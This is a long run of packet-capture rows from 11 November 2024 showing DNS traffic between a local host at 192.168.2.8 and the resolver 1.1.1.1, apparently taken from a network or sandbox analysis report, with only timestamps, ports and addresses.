                                                                                                                                                                                                          Nov 11, 2024 18:24:45.925467968 CET53528921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.927534103 CET6247253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.928864002 CET53569461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.935492039 CET5270153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.936306953 CET53589941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.937971115 CET53624721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.942292929 CET53524721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.942313910 CET53622061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.942827940 CET5121553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.943001032 CET53596611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.943706036 CET5007653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.943881035 CET6149453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.945229053 CET53527011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.945857048 CET5922353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.946029902 CET6089753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.952790976 CET5800553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.953022957 CET5068653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.953119040 CET5837153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.953171968 CET53608971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.953460932 CET5252553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.954530001 CET5474953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.955014944 CET5308253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.955332994 CET53500761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.955362082 CET53592231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.955647945 CET5002653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.955986977 CET53614941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.956021070 CET5804253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.960834026 CET53506861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.961944103 CET53580051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.963422060 CET53525251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.964751005 CET53530821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.966370106 CET53580421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.971065998 CET4962153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.973704100 CET53512151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.985260963 CET53583711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.986025095 CET53500261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.986388922 CET5064553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.988157988 CET53547491.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.997973919 CET53506451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:45.999716997 CET53598331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.004792929 CET53496211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.103636026 CET53632131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.123574972 CET6272053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.159339905 CET53627201.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.160336018 CET53630091.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.430560112 CET5798153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.432636023 CET6408853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.443413973 CET53640881.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.457586050 CET6391753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.457703114 CET6483053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.460745096 CET5618553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.462285042 CET53579811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.463886023 CET5232653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.467889071 CET53639171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.470849037 CET53561851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.487406015 CET53523261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.491137028 CET53648301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.496159077 CET5642753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.496881008 CET5826353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.506589890 CET6462453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.506771088 CET53564271.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.507570982 CET53582631.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.513143063 CET6078253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.516593933 CET5353153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.517364979 CET6449653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.517791986 CET5942953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.521095991 CET5133953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.521954060 CET5855953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.522880077 CET5759053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.524055004 CET53607821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.529367924 CET53594291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.531002045 CET6218553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.532192945 CET53513391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.533480883 CET5217753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.534076929 CET53585591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.537681103 CET53646241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.541785002 CET53575901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.545969009 CET5974653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.548290968 CET53535311.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.549639940 CET53644961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.549647093 CET53621851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.564354897 CET53521771.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.573056936 CET5768253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.574315071 CET4957053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.574594021 CET6065453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.574764967 CET5907353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.574949980 CET5671753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575099945 CET5713953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575238943 CET5365953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575377941 CET5023953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575509071 CET6041253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575659037 CET6128753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575802088 CET5885253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.575938940 CET4954653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.576082945 CET6294453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.576225042 CET5001253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.576364994 CET5560853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.576500893 CET5575153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.576630116 CET5026553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.578058958 CET53597461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.578979015 CET6479253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.582233906 CET5072953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.582525969 CET6142453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.584886074 CET53567171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.585663080 CET53612871.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.585872889 CET53557511.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.585879087 CET53536591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.585923910 CET53495701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.586090088 CET53629441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.586096048 CET53588521.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.587018013 CET53502391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.587029934 CET53571391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.587042093 CET53556081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.587047100 CET53502651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.588017941 CET53500121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.590629101 CET53647921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.592681885 CET53507291.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.593106031 CET53606541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.604082108 CET53576821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.605946064 CET53590731.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.607078075 CET53604121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.607799053 CET53495461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.610343933 CET6059453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.614238977 CET53614241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.617883921 CET5761853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619075060 CET6040553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619330883 CET6370453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619528055 CET6298253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619632006 CET5750653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619806051 CET4921653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619877100 CET6220253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.619992971 CET6441253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.620373011 CET5193853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.620579004 CET6478353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.621052980 CET5059953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.621243954 CET5010253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625456095 CET6361953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625629902 CET4953853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625792027 CET5355253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.625943899 CET5347053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626089096 CET5579253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626228094 CET5263953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626358986 CET5164653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.626620054 CET5100053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.627151012 CET5217253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.627552032 CET53519381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.627934933 CET5535053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.628942013 CET53576181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.628950119 CET53575061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.628956079 CET53637041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.630449057 CET53622021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.630641937 CET53505991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.630686045 CET53644121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.630692005 CET53647831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.630779982 CET53629821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.630930901 CET53492161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.631261110 CET53501021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.631983042 CET5722553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.635281086 CET53495381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.635478973 CET53534701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.635698080 CET53516461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.636054993 CET53535521.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.636811972 CET53526391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.636817932 CET53557921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.638787985 CET53553501.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.639271021 CET53521721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.641654968 CET53605941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.642784119 CET53572251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.644864082 CET53510001.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.653063059 CET53604051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.655654907 CET53636191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.822108030 CET5272453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:46.841851950 CET53527241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.960943937 CET5422153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.962795973 CET5296553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.963279963 CET5912553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.964711905 CET5748453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.966873884 CET5619253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.971230984 CET53542211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.971338034 CET5118653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.973758936 CET53529651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.974669933 CET6481553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.975748062 CET5000253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.976512909 CET53561921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.981995106 CET53648151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.983660936 CET53574841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.988666058 CET53500021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.988967896 CET4956153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.994606018 CET6357853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.994749069 CET5847853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.995125055 CET6522653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.995157003 CET5977553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.995582104 CET4961653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.996172905 CET53591251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:47.999301910 CET53495611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.003552914 CET53511861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.006021023 CET53584781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.015829086 CET5076653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.016064882 CET5607153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.023145914 CET6255853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.026187897 CET53652261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.026628971 CET53597751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.026639938 CET53560711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.026828051 CET53635781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.027009010 CET53496161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.029988050 CET53507661.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.030179977 CET6285553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.040757895 CET53625581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.048535109 CET5623053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.048825979 CET6419953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.049009085 CET5983853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.053539991 CET6255953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.053903103 CET5004553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.054615021 CET6246453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.056608915 CET5832153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.057251930 CET5337053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.059282064 CET53562301.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.059463024 CET6194653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.059684038 CET53598381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.061425924 CET6088053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.061707020 CET6384553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.061757088 CET53628551.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.066323042 CET53533701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.066414118 CET53583211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.070806026 CET53619461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.070818901 CET53608801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.071284056 CET53638451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.072216034 CET53625591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.072997093 CET53624641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.080430031 CET53641991.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.085669041 CET5280253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.086155891 CET6432753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.086332083 CET6479653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.086509943 CET5345553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.087625980 CET5202653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.087932110 CET53500451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.093360901 CET6496053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.093575001 CET53647961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.095619917 CET53643271.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.096559048 CET53528021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.096569061 CET53520261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.098310947 CET53534551.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.103138924 CET53649601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.107997894 CET5934953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.109899044 CET5791953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.117564917 CET53579191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.118222952 CET53593491.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.120982885 CET5088253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.121155977 CET5497353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.121305943 CET5448853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.121462107 CET5862853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122155905 CET5898453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122370005 CET6315353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122549057 CET5440653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122719049 CET5406853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.122870922 CET5819453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123016119 CET6266353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123156071 CET6210353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123342037 CET4987853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123609066 CET6420653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123830080 CET5568653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.123982906 CET5196153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.130822897 CET53549731.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.130851984 CET53586281.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.131813049 CET53544881.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.132173061 CET53544061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.132989883 CET5988953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.133291960 CET53631531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.133312941 CET53498781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.133610964 CET53642061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.133913994 CET53581941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.134162903 CET5316153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.134320021 CET5997153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.134474993 CET6068953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.134610891 CET6061953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.136610031 CET53519611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.136657953 CET5070853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.137723923 CET6196753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.137893915 CET5666853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.140275955 CET6338153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.144771099 CET53599711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.145143986 CET53598891.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.146162987 CET53507081.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.148566008 CET53619671.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.150181055 CET53633811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.151798964 CET53508821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.152945042 CET53589841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:48.153920889 CET53540681.1.1.1192.168.2.8
